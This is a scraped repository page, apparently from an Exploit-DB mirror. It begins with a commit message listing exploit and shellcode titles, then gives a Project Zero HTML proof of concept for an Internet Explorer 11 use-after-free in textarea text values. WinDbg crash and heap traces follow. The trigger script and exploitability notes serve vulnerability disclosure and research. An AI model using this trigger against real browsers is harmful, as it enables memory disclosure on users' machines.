ed0e1e4d44
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
130 lines
No EOL
6.3 KiB
HTML
130 lines
No EOL
6.3 KiB
HTML
<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1076
|
|
|
|
There is an use-after-free bug in IE which can lead to info leak / memory disclosure.
|
|
|
|
The bug was confirmed on Internet Explorer version 11.0.9600.18537 (update version 11.0.38)
|
|
|
|
PoC:
|
|
=========================================
|
|
-->
|
|
|
|
<!-- saved from url=(0014)about:internet -->
|
|
<script>
|
|
|
|
function run() {
|
|
var textarea = document.getElementById("textarea");
|
|
var frame = document.createElement("iframe");
|
|
|
|
textarea.appendChild(frame);
|
|
|
|
frame.contentDocument.onreadystatechange = eventhandler;
|
|
|
|
form.reset();
|
|
}
|
|
|
|
function eventhandler() {
|
|
document.getElementById("textarea").defaultValue = "foo";
|
|
alert("Text value freed, can be reallocated here");
|
|
}
|
|
|
|
</script>
|
|
<body onload=run()>
|
|
<form id="form">
|
|
<textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea>
|
|
|
|
<!--
|
|
=========================================
|
|
|
|
Please also see the attached screenshots that demonstrate using the PoC for memory disclosure.
|
|
|
|
The root cause of a bug is actually a use-after-free on the textarea text value, which can be seen if a PoC is run with Page Heap enabled. In that case IE crashes at
|
|
|
|
(b5c.f44): Access violation - code c0000005 (first chance)
|
|
First chance exceptions are reported before any exception handling.
|
|
This exception may be expected and handled.
|
|
eax=10abbff8 ebx=00000002 ecx=10abbff8 edx=10abbff8 esi=0e024ffc edi=00000000
|
|
eip=7582c006 esp=0a3aac48 ebp=0a3aac54 iopl=0 nv up ei pl nz na pe nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
|
|
msvcrt!wcscpy_s+0x46:
|
|
7582c006 0fb706 movzx eax,word ptr [esi] ds:002b:0e024ffc=????
|
|
0:008> k
|
|
# ChildEBP RetAddr
|
|
00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46
|
|
01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa
|
|
02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79
|
|
03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f
|
|
04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157
|
|
05 0a3aae40 706c05da MSHTML!CFastDOM::CHTMLFormElement::Trampoline_reset+0x33
|
|
06 0a3aaeb0 706b6d73 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d
|
|
07 0a3aaef8 706baa24 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
|
|
08 0a3ab19c 7071451a jscript9!Js::InterpreterStackFrame::Process+0x3a10
|
|
09 0a3ab1d4 70714579 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49
|
|
0a 0a3ab478 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x49a8
|
|
0b 0a3ab5b4 09780fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
|
|
WARNING: Frame IP not in any known module. Following frames may be wrong.
|
|
0c 0a3ab5c0 706bda16 0x9780fd9
|
|
0d 0a3ab868 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x1e62
|
|
0e 0a3ab984 09780fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
|
|
0f 0a3ab990 706b6d73 0x9780fe1
|
|
10 0a3ab9dc 706b73a8 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
|
|
11 0a3aba50 706b72dd jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
|
|
12 0a3aba98 706b7270 jscript9!ScriptSite::CallRootFunction+0x42
|
|
13 0a3abae4 7086d8f8 jscript9!ScriptSite::Execute+0xd2
|
|
14 0a3abb48 7165a587 jscript9!ScriptEngineBase::Execute+0xc7
|
|
15 0a3abc04 7165a421 MSHTML!CListenerDispatch::InvokeVar+0x15a
|
|
16 0a3abc30 7165a11c MSHTML!CListenerDispatch::Invoke+0x6d
|
|
17 0a3abcd0 7165a286 MSHTML!CEventMgr::_InvokeListeners+0x210
|
|
18 0a3abce8 7165a1ad MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42
|
|
19 0a3abd78 71659f1b MSHTML!CEventMgr::_InvokeListeners+0x150
|
|
1a 0a3abedc 714df1d7 MSHTML!CEventMgr::Dispatch+0x4d5
|
|
1b 0a3abf08 71969808 MSHTML!CEventMgr::DispatchEvent+0x90
|
|
1c 0a3abf40 7132de1f MSHTML!COmWindowProxy::Fire_onload+0x146
|
|
1d 0a3abfa0 7132df9c MSHTML!CMarkup::OnLoadStatusDone+0x5c0
|
|
1e 0a3abfbc 7132cd31 MSHTML!CMarkup::OnLoadStatus+0xed
|
|
1f 0a3ac400 714e8062 MSHTML!CProgSink::DoUpdate+0x48d
|
|
20 0a3ac40c 712de2f9 MSHTML!CProgSink::OnMethodCall+0x12
|
|
21 0a3ac45c 712ddcfa MSHTML!GlobalWndOnMethodCall+0x16c
|
|
22 0a3ac4b0 759962fa MSHTML!GlobalWndProc+0x103
|
|
23 0a3ac4dc 75996d3a user32!InternalCallWinProc+0x23
|
|
24 0a3ac554 759977c4 user32!UserCallWinProcCheckWow+0x109
|
|
25 0a3ac5b4 7599788a user32!DispatchMessageWorker+0x3b5
|
|
26 0a3ac5c4 726da99c user32!DispatchMessageW+0xf
|
|
27 0a3af794 7277ec38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
|
|
28 0a3af854 765182ec IEFRAME!LCIETab_ThreadProc+0x3e7
|
|
29 0a3af86c 73f73a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67
|
|
2a 0a3af8a4 75e0336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
|
|
2b 0a3af8b0 77b19902 kernel32!BaseThreadInitThunk+0xe
|
|
2c 0a3af8f0 77b198d5 ntdll!__RtlUserThreadStart+0x70
|
|
2d 0a3af908 00000000 ntdll!_RtlUserThreadStart+0x1b
|
|
|
|
where the old value was deleated at
|
|
|
|
0:008> !heap -p -a 0e024ffc
|
|
address 0e024ffc found in
|
|
_DPH_HEAP_ROOT @ f1000
|
|
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
|
|
dd03820: e024000 2000
|
|
7417947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d
|
|
77bb126b ntdll!RtlDebugReAllocateHeap+0x00000033
|
|
77b6de86 ntdll!RtlReAllocateHeap+0x00000054
|
|
71ba761f MSHTML!CTravelLog::_AddEntryInternal+0x00000215
|
|
71b8f48d MSHTML!MemoryProtection::HeapReAlloc<0>+0x00000026
|
|
71b8f446 MSHTML!_HeapRealloc<0>+0x00000011
|
|
7162deea MSHTML!BASICPROPPARAMS::SetStringProperty+0x00000546
|
|
71678877 MSHTML!CBase::put_StringHelper+0x0000004d
|
|
71fc6d60 MSHTML!CFastDOM::CHTMLTextAreaElement::Trampoline_Set_defaultValue+0x00000070
|
|
706c05da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000019d
|
|
706c0f77 jscript9!Js::JavascriptOperators::CallSetter+0x00000138
|
|
706c0eb4 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
|
|
70710cd3 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
|
|
70710b26 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
|
|
70710ba6 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
|
|
706ba60e jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
|
|
706bdbe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200
|
|
|
|
Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable.
|
|
|
|
Screenshots:
|
|
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41661.zip
|
|
--> |